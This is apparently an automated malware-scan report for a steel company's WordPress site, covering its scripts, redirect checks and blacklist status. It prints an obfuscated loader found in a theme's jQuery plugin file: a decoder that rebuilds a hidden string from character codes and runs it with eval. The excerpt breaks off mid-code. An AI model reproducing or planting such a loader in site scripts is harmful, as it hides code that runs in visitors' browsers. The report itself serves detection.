Scanned pages/files
Request | Server response | Status |
http://khansteels.com/ | 200 OK Content-Length: 35236 Content-Type: text/html | clean |
https://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js?ver=3.5.2 | 200 OK Content-Length: 94840 Content-Type: text/javascript | clean |
http://maps.google.com/maps/api/js?sensor=false&ver=3 | 200 OK Content-Length: 4898 Content-Type: text/javascript | clean |
http://khansteels.com/wp-content/plugins/nextgen-gallery/js/jquery.cycle.all.min.js?ver=2.9995 | 200 OK Content-Length: 26590 Content-Type: application/javascript | clean |
http://khansteels.com/wp-content/plugins/nextgen-gallery/js/ngg.slideshow.min.js?ver=1.06 | 200 OK Content-Length: 1791 Content-Type: application/javascript | clean |
http://khansteels.com/wp-content/themes/homedecore/js/hashchange.js | 200 OK Content-Length: 4831 Content-Type: application/javascript | clean |
http://khansteels.com/wp-content/themes/homedecore/js/dpagination.js | 200 OK Content-Length: 1326 Content-Type: application/javascript | clean |
http://khansteels.com/wp-content/themes/homedecore/js/superfish.js?ver=3.3.1 | 200 OK Content-Length: 3714 Content-Type: application/javascript | clean |
http://khansteels.com/wp-content/themes/homedecore/js/smthemes.js?ver=267 | 200 OK Content-Length: 9028 Content-Type: application/javascript | clean |
http://khansteels.com/wp-content/themes/homedecore/js/jquery.cycle.all.js | 200 OK Content-Length: 53031 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) iQuery=function(x) { var temp="",i,c=0,out="";l=x.length; while(c<=x.length-1){while(x.charAt(c)!='!')temp=temp+x.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";} eval(out); } ;(function($, undefined) { var ver = '2.9999'; if ($.support == undefined) { $.support = { opacity: !($.browser.msie) }; } function debug(s) { $.fn.cycle.debug && log(s); } function log() { win var rr = r < w ? r + parseInt(step * ((w-r)/count || 1),10) : w; $next.css({ clip: 'rect('+tt+'px '+rr+'px '+bb+'px '+ll+'px)' }); (step++ <= count) ? setTimeout(f, 13) : $curr.css('display', 'none'); })(); }); $.extend(opts.cssBefore, { display: 'block', opacity: 1, top: 0, left: 0 }); opts.animIn = { left: 0 }; opts.animOut = { left: 0 }; }; })(jQuery); Antivirus reports:
| ||
http://khansteels.com/wp-content/plugins/image-horizontal-reel-scroll-slideshow/image-horizontal-reel-scroll-slideshow.js | 200 OK Content-Length: 3887 Content-Type: application/javascript | clean |
http://khansteels.com/wp-includes/js/thickbox/thickbox.js?ver=3.1-20121105 | 200 OK Content-Length: 12417 Content-Type: application/javascript | clean |
http://khansteels.com/home-2/ | 200 OK Content-Length: 33965 Content-Type: text/html | clean |
http://khansteels.com/wp-content/themes/homedecore/js/smthemes.js?ver=493 | 200 OK Content-Length: 9028 Content-Type: application/javascript | clean |
http://khansteels.com/wp-includes/js/comment-reply.min.js?ver=3.5.2 | 200 OK Content-Length: 786 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: khansteels.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sat, 19 Apr 2014 22:34:37 GMT
Pragma: no-cache
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Vary: Cookie
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=e2b5395acbaf01f65ed064fa0c6a652d; path=/
X-Pingback: http://khansteels.com/xmlrpc.php
X-Powered-By: PHP/5.2.17
GET / HTTP/1.1
Host: khansteels.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sat, 19 Apr 2014 22:34:37 GMT
Pragma: no-cache
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Vary: Cookie
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=e2b5395acbaf01f65ed064fa0c6a652d; path=/
X-Pingback: http://khansteels.com/xmlrpc.php
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: khansteels.com
Referer: http://www.google.com/search?q=khansteels.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: khansteels.com
Referer: http://www.google.com/search?q=khansteels.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=khansteels.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://khansteels.com/
Result: khansteels.com is not infected or malware details are not published yet.
Result: khansteels.com is not infected or malware details are not published yet.